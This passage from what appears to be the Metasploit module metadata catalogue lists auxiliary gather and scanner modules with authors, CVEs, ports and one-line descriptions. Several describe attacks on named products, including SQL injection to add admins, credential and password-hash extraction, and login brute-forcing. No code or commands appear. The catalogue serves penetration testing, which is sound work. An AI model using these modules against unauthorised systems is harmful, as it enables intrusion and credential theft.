"auxiliary_gather/search_email_collector": {
"name": "Search Engine Domain Email Address Collector",
"full_name": "auxiliary/gather/search_email_collector",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module uses Google, Bing and Yahoo to create a list of\n valid email addresses for the target domain.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/search_email_collector.rb",
"is_install_path": true,
"ref_name": "gather/search_email_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/searchengine_subdomains_collector": {
"name": "Search Engine Subdomains Collector",
"full_name": "auxiliary/gather/searchengine_subdomains_collector",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "This module can be used to gather subdomains of a domain\n from Yahoo and Bing.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 04:43:03 +0000",
"path": "/modules/auxiliary/gather/searchengine_subdomains_collector.rb",
"is_install_path": true,
"ref_name": "gather/searchengine_subdomains_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/shodan_honeyscore": {
"name": "Shodan Honeyscore Client",
"full_name": "auxiliary/gather/shodan_honeyscore",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"thecarterb"
],
"description": "This module uses the Shodan API to check\n whether a server is a honeypot. The API\n returns a score from 0.0 to 1.0, with 1.0 indicating a honeypot.\n A Shodan API key is needed for this module to work properly.\n\n If you don't have an account, go here to register:\n https://account.shodan.io/register\n For more info on how their honeyscore system works, go here:\n https://honeyscore.shodan.io/",
"references": [
"URL-https://honeyscore.shodan.io/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:41:41 +0000",
"path": "/modules/auxiliary/gather/shodan_honeyscore.rb",
"is_install_path": true,
"ref_name": "gather/shodan_honeyscore",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/shodan_search": {
"name": "Shodan Search",
"full_name": "auxiliary/gather/shodan_search",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"John H Sawyer <john@sploitlab.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module uses the Shodan API to search Shodan. Accounts are free\n and an API key is required to use this module. Output from the module\n is displayed to the screen and can be saved to a file or the MSF database.\n NOTE: SHODAN filters (i.e. port, hostname, os, geo, city) can be used in\n queries, but there are limitations when used with a free API key. Please\n see the Shodan site for more information.\n Shodan website: https://www.shodan.io/\n API: https://developer.shodan.io/api",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:41:41 +0000",
"path": "/modules/auxiliary/gather/shodan_search.rb",
"is_install_path": true,
"ref_name": "gather/shodan_search",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/snare_registry": {
"name": "Snare Lite for Windows Registry Access",
"full_name": "auxiliary/gather/snare_registry",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module uses the Registry Dump feature of the Snare Lite\n for Windows service on 6161/TCP to retrieve the Windows registry.\n The Dump Registry functionality is unavailable in Snare Enterprise.\n\n Note: The Dump Registry functionality accepts only one connected\n client at a time. Requesting a large key/hive will cause the service\n to become unresponsive until the server completes the request.",
"references": [
"URL-https://www.intersectalliance.com/wp-content/uploads/user_guides/Guide_to_Snare_for_Windows-4.2.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 6161,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/gather/snare_registry.rb",
"is_install_path": true,
"ref_name": "gather/snare_registry",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/solarwinds_orion_sqli": {
"name": "Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation",
"full_name": "auxiliary/gather/solarwinds_orion_sqli",
"rank": 300,
"disclosure_date": "2015-02-24",
"type": "auxiliary",
"author": [
"Brandon Perry"
],
"description": "This module exploits a stacked SQL injection in order to add an administrator user to the\n SolarWinds Orion database.",
"references": [
"CVE-2014-9566"
],
"platform": "",
"arch": "",
"rport": 8787,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/solarwinds_orion_sqli.rb",
"is_install_path": true,
"ref_name": "gather/solarwinds_orion_sqli",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/ssllabs_scan": {
"name": "SSL Labs API Client",
"full_name": "auxiliary/gather/ssllabs_scan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Denis Kolegov <dnkolegov@gmail.com>",
"Francois Chagnon"
],
"description": "This module is a simple client for the SSL Labs APIs, designed for\n SSL/TLS assessment during a penetration test. Note that the assessment is\n performed by the remote SSL Labs service, so the target hostname is\n disclosed to a third party; confirm this is within scope before use.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-01-22 16:32:16 +0000",
"path": "/modules/auxiliary/gather/ssllabs_scan.rb",
"is_install_path": true,
"ref_name": "gather/ssllabs_scan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/teamtalk_creds": {
"name": "TeamTalk Gather Credentials",
"full_name": "auxiliary/gather/teamtalk_creds",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module retrieves user credentials from BearWare TeamTalk.\n\n Valid administrator credentials are required.\n\n This module has been tested successfully on TeamTalk versions\n 5.2.2.4885 and 5.2.3.4893.",
"references": [
"URL-https://github.com/BearWare/TeamTalk5/blob/master/ttphpadmin/tt5admin.php"
],
"platform": "",
"arch": "",
"rport": 10333,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/gather/teamtalk_creds.rb",
"is_install_path": true,
"ref_name": "gather/teamtalk_creds",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/trackit_sql_domain_creds": {
"name": "BMC / Numara Track-It! Domain Administrator and SQL Server User Password Disclosure",
"full_name": "auxiliary/gather/trackit_sql_domain_creds",
"rank": 300,
"disclosure_date": "2014-10-07",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an unauthenticated configuration retrieval .NET remoting\n service in Numara / BMC Track-It! v9 to v11.X, which can be abused to retrieve the Domain\n Administrator and the SQL server user credentials.\n This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,\n 10.0.0.143 and 9.0.30.248.",
"references": [
"CVE-2014-4872",
"OSVDB-112741",
"US-CERT-VU-121036",
"URL-https://seclists.org/fulldisclosure/2014/Oct/34"
],
"platform": "",
"arch": "",
"rport": 9010,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/trackit_sql_domain_creds.rb",
"is_install_path": true,
"ref_name": "gather/trackit_sql_domain_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/vbulletin_vote_sqli": {
"name": "vBulletin Password Collector via nodeid SQL Injection",
"full_name": "auxiliary/gather/vbulletin_vote_sqli",
"rank": 300,
"disclosure_date": "2013-03-24",
"type": "auxiliary",
"author": [
"Orestis Kourides",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a SQL injection vulnerability found in vBulletin 5 that has been\n used in the wild since March 2013. This module can be used to extract the web application's\n usernames and hashes, which could be used to authenticate into the vBulletin admin control\n panel.",
"references": [
"CVE-2013-3522",
"OSVDB-92031",
"EDB-24882",
"BID-58754",
"URL-http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/vbulletin_vote_sqli.rb",
"is_install_path": true,
"ref_name": "gather/vbulletin_vote_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/windows_deployment_services_shares": {
"name": "Microsoft Windows Deployment Services Unattend Gatherer",
"full_name": "auxiliary/gather/windows_deployment_services_shares",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will search remote file shares for unattended installation files that may contain\n domain credentials. This is often used after discovering domain credentials with the\n auxiliary/scanner/dcerpc/windows_deployment_services module or in cases where you already\n have domain credentials. This module will connect to the RemInst share and any Microsoft\n Deployment Toolkit shares indicated by the share name comments.",
"references": [
"MSDN-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx",
"URL-http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2019-03-05 03:41:41 +0000",
"path": "/modules/auxiliary/gather/windows_deployment_services_shares.rb",
"is_install_path": true,
"ref_name": "gather/windows_deployment_services_shares",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/wp_all_in_one_migration_export": {
"name": "WordPress All-in-One Migration Export",
"full_name": "auxiliary/gather/wp_all_in_one_migration_export",
"rank": 300,
"disclosure_date": "2015-03-19",
"type": "auxiliary",
"author": [
"James Golovich",
"rastating"
],
"description": "This module allows you to export Wordpress data (such as the database, plugins, themes,\n uploaded files, etc) via the All-in-One Migration plugin without authentication.",
"references": [
"WPVDB-7857",
"URL-http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/auxiliary/gather/wp_all_in_one_migration_export.rb",
"is_install_path": true,
"ref_name": "gather/wp_all_in_one_migration_export",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/wp_ultimate_csv_importer_user_extract": {
"name": "WordPress Ultimate CSV Importer User Table Extract",
"full_name": "auxiliary/gather/wp_ultimate_csv_importer_user_extract",
"rank": 300,
"disclosure_date": "2015-02-02",
"type": "auxiliary",
"author": [
"James Hooker",
"rastating"
],
"description": "Due to lack of verification of a visitor's permissions, it is possible\n to execute the 'export.php' script included in the default installation of the\n Ultimate CSV Importer plugin and retrieve the full contents of the user table\n in the WordPress installation. This results in full disclosure of usernames,\n hashed passwords and email addresses for all users.",
"references": [
"WPVDB-7778"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb",
"is_install_path": true,
"ref_name": "gather/wp_ultimate_csv_importer_user_extract",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/wp_w3_total_cache_hash_extract": {
"name": "WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract",
"full_name": "auxiliary/gather/wp_w3_total_cache_hash_extract",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christian Mehlmauer <FireFart@gmail.com>",
"Jason A. Donenfeld <Jason@zx2c4.com>"
],
"description": "The W3-Total-Cache WordPress Plugin <= 0.9.2.4 can cache database statements\n and their results in files for fast access. Version 0.9.2.4 was patched after its\n initial release, so an installation reporting that version may or may not be vulnerable.\n These cache files are stored in the webroot of the WordPress\n installation and can be downloaded if their names are guessed. This module tries to\n locate them by brute force in order to find usernames and password hashes in these\n files. W3 Total Cache must be configured with Database Cache enabled and Database\n Cache Method set to Disk to be vulnerable.",
"references": [
"OSVDB-88744",
"URL-https://seclists.org/fulldisclosure/2012/Dec/242",
"WPVDB-6621"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb",
"is_install_path": true,
"ref_name": "gather/wp_w3_total_cache_hash_extract",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/xbmc_traversal": {
"name": "XBMC Web Server Directory Traversal",
"full_name": "auxiliary/gather/xbmc_traversal",
"rank": 300,
"disclosure_date": "2012-11-04",
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"Lucas \"acidgen\" Lundgren IOActive",
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module exploits a directory traversal bug in XBMC 11, up until the\n 2012-11-04 nightly build. The module can only be used to retrieve files.",
"references": [
"URL-http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348",
"URL-https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335",
"URL-http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/xbmc_traversal.rb",
"is_install_path": true,
"ref_name": "gather/xbmc_traversal",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/xerox_pwd_extract": {
"name": "Xerox Administrator Console Password Extractor",
"full_name": "auxiliary/gather/xerox_pwd_extract",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"Percentx\" Heiland",
"Pete \"Bokojan\" Arzamendi"
],
"description": "This module will extract the management console's admin password from the\n Xerox file system using firmware bootstrap injection.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/xerox_pwd_extract.rb",
"is_install_path": true,
"ref_name": "gather/xerox_pwd_extract",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/xerox_workcentre_5xxx_ldap": {
"name": "Xerox Workcentre 5735 LDAP Service Credential Extractor",
"full_name": "auxiliary/gather/xerox_workcentre_5xxx_ldap",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"Percentx\" Heiland",
"Pete \"Bokojan\" Arzamendi"
],
"description": "This module extracts the printer's LDAP username and password from a Xerox Workcentre 5735.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb",
"is_install_path": true,
"ref_name": "gather/xerox_workcentre_5xxx_ldap",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/zabbix_toggleids_sqli": {
"name": "Zabbix toggle_ids SQL Injection",
"full_name": "auxiliary/gather/zabbix_toggleids_sqli",
"rank": 300,
"disclosure_date": "2016-08-11",
"type": "auxiliary",
"author": [
"1n3 <1n3@hushmail.com>",
"bperry"
],
"description": "This module will exploit a SQL injection in Zabbix 3.0.3 and\n likely prior in order to save the current usernames and\n password hashes from the database to a JSON file.",
"references": [
"CVE-2016-10134",
"URL-https://seclists.org/fulldisclosure/2016/Aug/60"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/zabbix_toggleids_sqli.rb",
"is_install_path": true,
"ref_name": "gather/zabbix_toggleids_sqli",
"check": true,
"post_auth": false,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/zoomeye_search": {
"name": "ZoomEye Search",
"full_name": "auxiliary/gather/zoomeye_search",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "This module uses the ZoomEye API to search ZoomEye. ZoomEye is a search\n engine for cyberspace that lets the user find specific network\n components (IP addresses, services, etc.).",
"references": [
"URL-https://github.com/zoomeye/SDK",
"URL-https://www.zoomeye.org/api/doc",
"URL-https://www.zoomeye.org/help/manual"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:41:41 +0000",
"path": "/modules/auxiliary/gather/zoomeye_search.rb",
"is_install_path": true,
"ref_name": "gather/zoomeye_search",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_parser/unattend": {
"name": "Auxiliary Parser Windows Unattend Passwords",
"full_name": "auxiliary/parser/unattend",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module parses Unattend files in the target directory.\n\n See also: post/windows/gather/enum_unattend",
"references": [
"URL-http://technet.microsoft.com/en-us/library/ff715801",
"URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx",
"URL-http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/parser/unattend.rb",
"is_install_path": true,
"ref_name": "parser/unattend",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_pdf/foxit/authbypass": {
"name": "Foxit Reader Authorization Bypass",
"full_name": "auxiliary/pdf/foxit/authbypass",
"rank": 300,
"disclosure_date": "2009-03-09",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits an authorization bypass vulnerability in Foxit Reader\n build 1120. When an attacker creates a specially crafted pdf file containing\n an Open/Execute action, arbitrary commands can be executed without confirmation\n from the victim.",
"references": [
"CVE-2009-0836",
"OSVDB-55615",
"BID-34035"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/pdf/foxit/authbypass.rb",
"is_install_path": true,
"ref_name": "pdf/foxit/authbypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/acpp/login": {
"name": "Apple Airport ACPP Authentication Scanner",
"full_name": "auxiliary/scanner/acpp/login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module attempts to authenticate to an Apple Airport using its\n proprietary and largely undocumented protocol known only as ACPP.",
"references": [
"CVE-2003-0270"
],
"platform": "",
"arch": "",
"rport": 5009,
"autofilter_ports": [
5009
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/acpp/login.rb",
"is_install_path": true,
"ref_name": "scanner/acpp/login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/afp/afp_login": {
"name": "Apple Filing Protocol Login Utility",
"full_name": "auxiliary/scanner/afp/afp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Gregory Man <man.gregory@gmail.com>"
],
"description": "This module attempts to brute-force authentication credentials for AFP.",
"references": [
"URL-https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html",
"URL-https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html"
],
"platform": "",
"arch": "",
"rport": 548,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/afp/afp_login.rb",
"is_install_path": true,
"ref_name": "scanner/afp/afp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/afp/afp_server_info": {
"name": "Apple Filing Protocol Info Enumerator",
"full_name": "auxiliary/scanner/afp/afp_server_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Gregory Man <man.gregory@gmail.com>"
],
"description": "This module fetches AFP server information, including server name,\n network address, supported AFP versions, signature, machine type,\n and server flags.",
"references": [
"URL-https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html"
],
"platform": "",
"arch": "",
"rport": 548,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/afp/afp_server_info.rb",
"is_install_path": true,
"ref_name": "scanner/afp/afp_server_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/backdoor/energizer_duo_detect": {
"name": "Energizer DUO Trojan Scanner",
"full_name": "auxiliary/scanner/backdoor/energizer_duo_detect",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect instances of the Energizer DUO trojan horse software on port 7777",
"references": [
"CVE-2010-0103",
"OSVDB-62782",
"US-CERT-VU-154421"
],
"platform": "",
"arch": "",
"rport": 7777,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb",
"is_install_path": true,
"ref_name": "scanner/backdoor/energizer_duo_detect",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/chargen/chargen_probe": {
"name": "Chargen Probe Utility",
"full_name": "auxiliary/scanner/chargen/chargen_probe",
"rank": 300,
"disclosure_date": "1996-02-08",
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "Chargen is a debugging and measurement tool and a character\n generator service. A character generator service simply sends\n data without regard to the input.\n Chargen is susceptible to spoofing the source of transmissions\n as well as use in a reflection attack vector. The misuse of the\n testing features of the Chargen service may allow attackers to\n craft malicious network payloads and reflect them by spoofing\n the transmission source to effectively direct it to a target.\n This can result in traffic loops and service degradation with\n large amounts of network traffic.",
"references": [
"CVE-1999-0103",
"URL-http://tools.ietf.org/html/rfc864"
],
"platform": "",
"arch": "",
"rport": 19,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/chargen/chargen_probe.rb",
"is_install_path": true,
"ref_name": "scanner/chargen/chargen_probe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/couchdb/couchdb_enum": {
"name": "CouchDB Enum Utility",
"full_name": "auxiliary/scanner/couchdb/couchdb_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Max Justicz",
"Roberto Soares Espreto <robertoespreto@gmail.com>",
"Hendrik Van Belleghem",
"Green-m <greenm.xxoo@gmail.com>"
],
"description": "This module enumerates databases on CouchDB using the REST API\n (without authentication by default).",
"references": [
"CVE-2017-12635",
"URL-https://justi.cz/security/2017/11/14/couchdb-rce-npm.html",
"URL-https://wiki.apache.org/couchdb/HTTP_database_API"
],
"platform": "",
"arch": "",
"rport": 5984,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-01-07 11:18:19 +0000",
"path": "/modules/auxiliary/scanner/couchdb/couchdb_enum.rb",
"is_install_path": true,
"ref_name": "scanner/couchdb/couchdb_enum",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/couchdb/couchdb_login": {
"name": "CouchDB Login Utility",
"full_name": "auxiliary/scanner/couchdb/couchdb_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"espreto <robertoespreto@gmail.com>"
],
"description": "This module tests CouchDB logins on a range of\n machines and reports successful logins.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5984,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/couchdb/couchdb_login.rb",
"is_install_path": true,
"ref_name": "scanner/couchdb/couchdb_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/db2/db2_auth": {
"name": "DB2 Authentication Brute Force Utility",
"full_name": "auxiliary/scanner/db2/db2_auth",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module attempts to authenticate against a DB2\n instance using username and password combinations indicated by the\n USER_FILE, PASS_FILE, and USERPASS_FILE options.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 50000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/db2/db2_auth.rb",
"is_install_path": true,
"ref_name": "scanner/db2/db2_auth",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/db2/db2_version": {
"name": "DB2 Probe Utility",
"full_name": "auxiliary/scanner/db2/db2_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module queries a DB2 instance for version and configuration information.",
"references": [
],
"platform": "",
"arch": "",
"rport": 50000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/db2/db2_version.rb",
"is_install_path": true,
"ref_name": "scanner/db2/db2_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/db2/discovery": {
"name": "DB2 Discovery Service Detection",
"full_name": "auxiliary/scanner/db2/discovery",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply queries the DB2 discovery service for information.",
"references": [
],
"platform": "",
"arch": "",
"rport": 523,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/db2/discovery.rb",
"is_install_path": true,
"ref_name": "scanner/db2/discovery",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dcerpc/endpoint_mapper": {
"name": "Endpoint Mapper Service Discovery",
"full_name": "auxiliary/scanner/dcerpc/endpoint_mapper",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to obtain information from the\n Endpoint Mapper service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 135,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb",
"is_install_path": true,
"ref_name": "scanner/dcerpc/endpoint_mapper",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dcerpc/hidden": {
"name": "Hidden DCERPC Service Discovery",
"full_name": "auxiliary/scanner/dcerpc/hidden",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module will query the endpoint mapper and make a list\n of all ncacn_tcp RPC services. It will then connect to each of\n these services and use the management API to list all other\n RPC services accessible on this port. Any RPC service found attached\n to a TCP port, but not listed in the endpoint mapper, will be displayed\n and analyzed to see whether anonymous access is permitted.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 04:43:37 +0000",
"path": "/modules/auxiliary/scanner/dcerpc/hidden.rb",
"is_install_path": true,
"ref_name": "scanner/dcerpc/hidden",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
